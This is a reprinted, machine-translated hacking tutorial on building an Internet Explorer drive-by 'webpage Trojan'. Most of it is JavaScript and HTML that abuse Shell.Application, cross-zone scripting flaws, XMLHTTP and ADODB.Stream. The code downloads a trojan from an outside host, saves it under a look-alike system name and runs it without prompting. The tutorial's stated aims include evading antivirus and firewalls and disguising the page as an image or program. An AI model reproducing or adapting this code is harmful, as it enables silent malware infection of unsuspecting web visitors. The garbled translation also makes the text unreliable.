[Reprint] creating a perfect ie webpage Trojan

Information Source: icyfox
Author: Ice Fox prodigal son

(Test page: http://www.godog.y365.com/runexe/icyfox.htm. the program running here is not a Trojan !)

To create a perfect ie webpage Trojan, we must first develop a perfect standard for us. I personally think that a perfect ie webpage Trojan should have at least four of the following features:
1. Attackers can bypass antivirus software attacks;
2. network firewall alarms can be avoided;
Iii. applicable to most ie versions (including ie5.0, ie5.5, and ie6.0) in most Windows operating systems (including Win98, winme, Win2000, WINXP, and win2003 ), it is best to bring down the SP patch;
4. It makes it difficult for viewers to discover the changes in IE, that is, they can be quietly invisible for a long time.
(Note that the above four points only refer to the webpage, but do not include your Trojan program. That is to say, our webpage Trojan is only responsible for running the specified Trojan program, as for the quality of your Trojan program, only you have to choose it! Don't ask me for it. I won't write it !)
Meet the above four points I want to make your horse more youthful and longer-lasting, faster ......
After reading the above points, Are you tempted? Don't worry. Let's start with the shortcomings of the existing Internet Web Trojans!
First: IE webpage trojan that exploits the ancient mime Vulnerability
This kind of Trojan is still popular, but because the vulnerability is too old and has few suitable ie versions, the impacts were too great at the time, and the patches were almost completed, therefore, the planting success rate of this trojan is relatively low.
Second, use the com. Ms. ActiveX. activexcomponent vulnerability, and combine the IE web Trojan of the wsh and FSO controls
Although COM. ms. activeX. the activexcomponent vulnerability is widely used in most ie versions. It is a good vulnerability and has a high exploitation value. However, it combines wsh and FSO controls called by popular viruses, although it can avoid network firewall alarms, it can escape the pursuit of anti-virus software (such as Norton ).
Third: the object data remote vulnerability combined with the IE web Trojan of the wsh and FSO controls (typically represented by an animation shark web Trojan generator)
The biggest advantage of this trojan is that it is suitable for many Internet Explorer versions and has newer vulnerabilities, but it has the following shortcomings:
1. In this case, mshta.exe is used to access the network to download the trojan program, which will cause firewall alarms (such as Skynet firewall );
2. If the IE web trojan uses the wsh and FSO controls, it will also escape the pursuit of anti-virus software (such as Norton ).
The shark web trojan uses the wsh and FSO controls to sigh ...... Unfortunately ......?
3. This vulnerability requires Web servers to support dynamic web pages, such as ASP, JSP, and CGI, which affects the performance of web servers, after all, the free and stable dynamic web page space is few. Although this vulnerability can also be exploited in the form of mail mime (see my article on security focus: due to the exploitation of the error mime vulnerability ...... --- IE Object Data Remote Execution Vulnerability of the use of http://www.xfocus.net/articles/200309/607.html), but the test found that ie6.0 does not work.
If you see the analysis above, do you have this feeling: qianjun is easy to get, it will be hard to find, Ma Er groups, but qianqianma is hard to find! Don't worry. Let me take this together to create the perfect ie webpage trojan in my heart.
First of all, we need to get rid of anti-virus software, so we cannot use the wsh and FSO controls, because as long as we use the wsh and FSO controls, we will not be able to escape the "Norton" command, how can we do this ?! Don't worry. After my hard work (I was also inspired by the accidental discovery of ASP Trojans), I finally found a usable control, Shell. application, which has passed Security Authentication, can be smoothly executed on the webpage in the "my computer" domain, it is easier to obtain execution permissions than wsh and FSO (you can exploit cross-origin vulnerabilities). See the following JavaScript code:
Program code:

<Script language = "JavaScript" type = "text/JavaScript">
VaR shell = new activexobject ("Shell. Application ");
Shell. namespace ("C: // windows //"). Items (). Item ("notepad.exe"). invokeverb ();
</SCRIPT>

Save it as test.htm and check whether the Notepad program is automatically opened. The prompt box Indicating whether to allow running is not displayed like wsh and FSO. Is it a bit of interest? Now we can run all programs with known paths, but we need to run our own Trojan program, we also need to download our Trojan program to the viewer's computer and find its location. One by one:
1. Download the trojan program to the viewer's computer.
There are many solutions to this problem. For example, I mentioned the Windows Help File Access Protocol to download arbitrary file vulnerabilities (its :), but this time we don't need it. We will teach you two better download methods:
Example 1: using the script tag, the Code is as follows:
<Script language = "icyfoxlovelace" src = "http://www.godog.y365.com/wodemuma/icyfox.bat";> </SCRIPT>

Note that the language attribute here can be a string other than JavaScript, VBScript, and JScript, or a Chinese character. The src attribute is the address of your Trojan! Because currently free space is not allowed to upload EXE files for security reasons, we can change the extension EXE to bat, PIF, Scr, and COM.
Example 2: using the link tag, the Code is as follows:

<Link href = "http://www.godog.y365.com/wodemuma/icyfox.bat"; rel = stylesheet type = text/CSS>

Place the code in the middle of the tag The above two are the best methods for downloading Trojans I know. The Downloaded Programs are saved in the subdirectory of the temporary ie directory Temporary Internet Files.
2. Find the trojan program path that has been downloaded to the viewer.
We can use shell. some attributes and methods of the application control, combined with the JS error handling try {} catch (e) {} finally {} statement, are recursively called to find the trojan program path, the Code is as follows:

Function icyfoxlovelace (){
// Obtain the Windows System directory and System Disk
Url = Document. Location. href;
Xtmu = URL. substring (6, URL. indexof ('//', 9) + 1 );
Xtp = URL. substr (6, 3 );

VaR shell = new activexobject ("Shell. Application ");
VaR runbz = 1;

// Set the trojan size in bytes.
// Change 198201 to the actual size of your Trojan program
VaR exesize = 198201;

// Sets the trojan program name and Extension (exe, COM, bat, PIF, Scr) to determine whether the trojan program is downloaded.
// Change icyfox in the following two lines to your Trojan program name, and change BAT to your Trojan program extension.
VaR A =/icyfox/[/D */]/. BAT/GI;
A. Compile ("icyfox // [// D * //] //. Bat", "Gi ");

VaR B =/[A-Za-Z]: // gi;
B. Compile ("[A-Za-Z]: //", "Gi"); // regular expression used to determine whether it is the root directory of the Disk

// The following code finds and runs the trojan program
WJJ (xtmu + "Temporary Internet Files //"); // content. ie5 //
If (runbz) WJJ (xtp + "statements and settings //");
If (runbz) Yp ();

// Search for and run the trojan program in all hard disk partitions
Function Yp (){
Try {
VaR c = new enumerator (shell. namespace ("C: //"). parentfolder. Items ());
For (;! C. atend (); C. movenext ()){
If (runbz) {If (B. Test (C. Item (). Path) WJJ (C. Item (). Path );}
Else break;
}
} Catch (e ){}
}

// Recursively search for and run the trojan program in a specified directory (including sub-Directories)
Function WJJ (B ){
Try {
VaR c = new enumerator (shell. namespace (B). Items ());
For (;! C. atend (); C. movenext ()){
If (runbz & C. Item (). size = exesize & A. Test (C. Item (). Path )){
VaR F = C. Item (). path;
VaR v = f. lastindexof ('//') + 1;
Try {
Shell. namespace (F. substring (0, V). Items (). Item (F. substr (V). invokeverb (); // run the trojan program
Runbz = 0;
Break;
} Catch (e ){}
}
If (! C. Item (). Size) WJJ (C. Item (). Path + "//"); // recursively calls
}
} Catch (e ){}
}

}

Icyfoxlovelace ();

Save the above Code as icyfox. js.

Next, we will use a small cross-origin execution vulnerability to obtain webpage permissions for the "my computer" domain. Do you think this vulnerability is only used for cross-site scripting attacks, what about getting cookies? This time it can finally show your face! The Code is as follows:

Program code: <HTML> <Head> <Meta http-equiv = Content-Type content = "text/html; charset = gb2312"> <Title> perfect ie web Trojan of the ice Fox Longson Network Technology Lab </title> </Head> <Body oncontextmenu = "Return false" onselectstart = "Return false" scroll = "no" topmargin = "0" leftmargin = "0"> <Script language = "icyfoxlovelace" src = "http://www.godog.y365.com/wodemuma/icyfox.bat";> </SCRIPT> <Script language = "JavaScript"> // Set the network address of the above icyfox. JS File // Upload the icyfox.js file in http://www.godog.y365.com/wodemuma/icyfox.jsto the address Jsurl = "http://www.godog.y365.com/wodemuma/icyfox.js";. Replace (// G ,'//'); Wie = navigator. appversion; If (WIE. indexof ("MSIE 5.0")>-1 ){ /* If IE 5.0 uses the IFRAME label and the src attribute is set to icyfox: //, this label will have the "my computer" Domain permission, because icyfox: // is a non-existent protocol, so IE will use Res: // The coroutine to open the syntax error page syntax.htm in shdoclc.dll, and shdoclc. the DLL is located in the system directory again. JS to obtain the Windows System directory and system disk to provide data ;*/ Document. Write ("<IFRAME Style = 'display: none; 'name = 'icyfoxlovelace 'src = 'icyfox: //'> <// IFRAME> "); SetTimeout ("muma0 ()", 1000 ); } Else { /* Ie5.5 and ie6.0 use the _ search vulnerability to set the opened address to icyfox: //, so that the _ search box has the "my computer" Domain permission, because the above IFRAME vulnerability cannot be used in ie6.0, ie5.5 should be available and I did not test it. This will open the search box. Sorry! */ Window. Open ("icyfox: //", "_ search "); SetTimeout ("muma1 ()", 1000 ); } // The following code uses file: javascript: Protocol Vulnerability to insert and run the icyfox. js script in "icyfox: //", which is already in the "my computer" domain. Function muma0 (){ Window. open ("file: javascript: document. all. tags ('script') [0]. src = '"+ jsurl +"'; EVAL (); "," icyfoxlovelace "); } Function muma1 (){ Window. open ("file: javascript: document. all. tags ('script') [0]. src = '"+ jsurl +"'; EVAL (); "," _ search ");} </SCRIPT> </Body> <NoScript> <IFRAME Style = "display: none;" src = '*. *'> </iframe> </NoScript> </Html>

Save your code as icyfox.htm. If you want to change the extension to JPG, add a beautiful image background to the webpage, and create an image Trojan. You can even change it to EXE to pretend to be a good program, add the <meta http-equiv = "refresh" content = "5; url = 'HTTP: // www.godog.y365.com/winrar.exe' "> to switch to another real program at regular intervals, so as to better cheat others.

Seeing whether the above stuff gives you the impulse to experiment right away, don't worry. If you think Win98 doesn't have to be controlled, there will be better Trojans waiting for you, I wonder if you have used the default ADODB installed in systems such as Win2000 and WINXP. stream and Microsoft. XMLHTTP control? They are also securely certified like the shell. application controls. They can be freely executed on webpages in the "my computer" domain! See the following code:

Program code: Function icyfox (){ // Set the trojan program name in the system directory after the download. What I set is not very similar to assumer.exe? Haha VaR name = "explroer.exe "; // Set the URL of the Trojan program you want to download. (You can modify the extension without any extension) // The free homepage space upload restrictions can be better avoided VaR url = "http://www.godog.y365.com/wodemuma/icyfox.bat ";; Try { VaR folder = Document. Location. href; Folder = folder. substring (6, folder. indexof ('//', 9) + 1) + name; VaR xml = new activexobject ("Microsoft. XMLHTTP "); XML. Open ("get", URL, false ); XML. Send (); If (XML. Status = 200 ){ VaR ADO = new activexobject ("ADODB. Stream "); Ado. type = 1; Ado. open (); Ado. Write (XML. responsebody ); Ado. savetofile (folder, 2 ); Ado. Close (); Ado = NULL; } Xml = NULL; Document. body. insertadjacenthtml ('afterbegin', '<object style = "display: none; "type =" application/X-oleobject "codebase =" '+ folder +' "> </Object> '); } Catch (e ){} } Icyfox ();

The hacker is injected into the "my computer" domain!
Finally, please take advantage of the following DIY capabilities to combine the above two types of code into one. I believe that the most perfect ie web Trojan will be born in your hands! Are you sure you want to know it?
The prompt code is as follows:

Program code:

Try {New activexobject ("ADODB. Stream"); icyfox () ;}catch (e) {icyfoxlovelace ();}